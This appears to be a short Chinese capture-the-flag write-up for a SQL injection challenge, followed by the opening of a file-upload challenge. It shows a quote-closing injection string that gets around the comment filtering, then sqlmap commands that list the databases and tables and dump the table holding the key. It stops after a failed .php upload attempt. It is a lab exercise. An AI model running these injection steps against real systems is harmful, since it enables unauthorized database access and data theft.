一、34071(sql注入)
1、get型,首先想办法闭合语句:
(1)从代码中可以看出,--、#及其url转义均被屏蔽
(2)前面加1',结尾加or '1, 来闭合语句:
2、语句成功闭合,使用sqlmap进行sql注入:
(1)查询数据库:
python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" --dbs -batch
查询到“2web”和“information_schema”两个数据库
(2)查询2web数据库中的表:
python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" -D 2web --tables -batch
成功查询到“Article”和"IS_KEY"两个表,显然key大概率在is_key表里
(3)查询表格“IS_KEY”:
python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" -D 2web --tables -T IS_KEY --dump -batch
成功拿到key:
二、34072 (文件上传)
1、尝试上传.php文件失败